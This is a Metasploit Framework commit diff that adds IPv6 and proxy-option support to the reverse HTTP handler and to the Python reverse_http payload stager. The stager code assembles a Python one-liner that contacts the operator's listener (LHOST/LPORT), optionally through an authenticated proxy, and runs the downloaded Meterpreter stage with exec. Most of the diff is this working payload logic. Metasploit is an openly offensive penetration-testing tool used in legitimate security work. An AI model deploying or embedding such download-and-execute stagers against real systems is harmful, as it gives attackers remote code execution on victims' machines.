Adds IPv6 and option-related issues with the previous patch

HD Moore · HD Moore · commit 2ab14e7e7944 · 2015-03-18T01:01:10.000-05:00
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
@@ -58,33 +58,25 @@ def initialize(info = {})
       ], Msf::Handler::ReverseHttp)
   end
 
-  # Toggle for IPv4 vs IPv6 mode
-  #
-  def ipv6?
-    Rex::Socket.is_ipv6?(datastore['LHOST'])
-  end
-
   # Determine where to bind the server
   #
   # @return [String]
   def listener_address
-    if datastore['ReverseListenerBindAddress'].to_s.empty?
-      bindaddr = (ipv6?) ? '::' : '0.0.0.0'
+    if datastore['ReverseListenerBindAddress'].to_s == ""
+      bindaddr = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '::' : '0.0.0.0'
     else
       bindaddr = datastore['ReverseListenerBindAddress']
     end
 
     bindaddr
   end
 
+  # Return a URI suitable for placing in a payload
+  #
   # @return [String] A URI of the form +scheme://host:port/+
   def listener_uri
-    if ipv6?
-      listen_host = "[#{listener_address}]"
-    else
-      listen_host = listener_address
-    end
-    "#{scheme}://#{listen_host}:#{datastore['LPORT']}/"
+    uri_host = Rex::Socket.is_ipv6?(listener_address) ? "[#{listener_address}]" : listener_address
+    "#{scheme}://#{uri_host}:#{datastore['LPORT']}/"
   end
 
   # Return a URI suitable for placing in a payload.
@@ -192,22 +184,24 @@ def lookup_proxy_settings
     info[:port] = (datastore['PROXY_PORT'] || 8080).to_i
     info[:type] = datastore['PROXY_TYPE'].to_s
 
-    if info[:port] == 80
-      info[:info] = info[:host]
-    else
-      info[:info] = "#{info[:host]}:#{info[:port]}"
+    uri_host = info[:host]
+
+    if Rex::Socket.is_ipv6?(uri_host)
+      uri_host = "[#{info[:host]}]"
     end
 
-    if info[:type] == "HTTP"
+    info[:info] = "#{uri_host}:#{info[:port]}"
+
+    if info[:type] == "SOCKS"
+      info[:info] = "socks=#{info[:info]}"
+    else
       info[:info] = "http://#{info[:info]}"
       if datastore['PROXY_USERNAME'].to_s != ""
         info[:username] = datastore['PROXY_USERNAME'].to_s
       end
       if datastore['PROXY_PASSWORD'].to_s != ""
         info[:password] = datastore['PROXY_PASSWORD'].to_s
       end
-    else
-      info[:info] = "socks=#{info[:info]}"
     end
 
     @proxy_settings = info
@@ -242,7 +236,7 @@ def on_request(cli, req, obj)
         blob.sub!('HTTP_COMMUNICATION_TIMEOUT = 300', "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
         blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")
 
-        if @proxy_settings[:host] && @proxy_settings[:type] == "HTTP"
+        if @proxy_settings[:host]
           blob.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(@proxy_settings[:info])}'")
         end
 
diff --git a/modules/payloads/stagers/python/reverse_http.rb b/modules/payloads/stagers/python/reverse_http.rb
@@ -28,6 +28,8 @@ def initialize(info = {})
       [
         OptString.new('PROXY_HOST', [false, "The proxy server's IP address"]),
         OptPort.new('PROXY_PORT', [true, "The proxy port to connect to", 8080 ]),
+        OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentication"]),
+        OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentication"])
       ], Msf::Handler::ReverseHttp)
   end
 
@@ -41,21 +43,32 @@ def generate
       txt.gsub('\\', '\\'*4).gsub('\'', %q(\\\'))
     }
 
-    target_url  = 'http://'
-    target_url << lhost
+    if Rex::Socket.is_ipv6?(lhost)
+      target_url = "http://[#{lhost}]"
+    else
+      target_url = "http://#{lhost}"
+    end
+
     target_url << ':'
     target_url << datastore['LPORT'].to_s
     target_url << '/'
     target_url << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP)
 
+    proxy_host = datastore['PROXY_HOST'].to_s
+    proxy_port = datastore['PROXY_PORT'].to_i
+
     cmd  = "import sys\n"
-    if datastore['PROXY_HOST'].to_s == ''
+    if proxy_host == ''
       cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n"
     else
-      proxy_url = "http://#{datastore['PROXY_HOST']}:#{datastore['PROXY_PORT']}"
+      proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
+        "http://[#{proxy_host}]:#{proxy_port}" :
+        "http://#{proxy_host}:#{proxy_port}"
+
       cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n"
       cmd << "o=ul.build_opener(ul.ProxyHandler({'http':'#{var_escape.call(proxy_url)}'}))\n"
     end
+
     cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
     cmd << "exec(o.open('#{target_url}').read())\n"
 
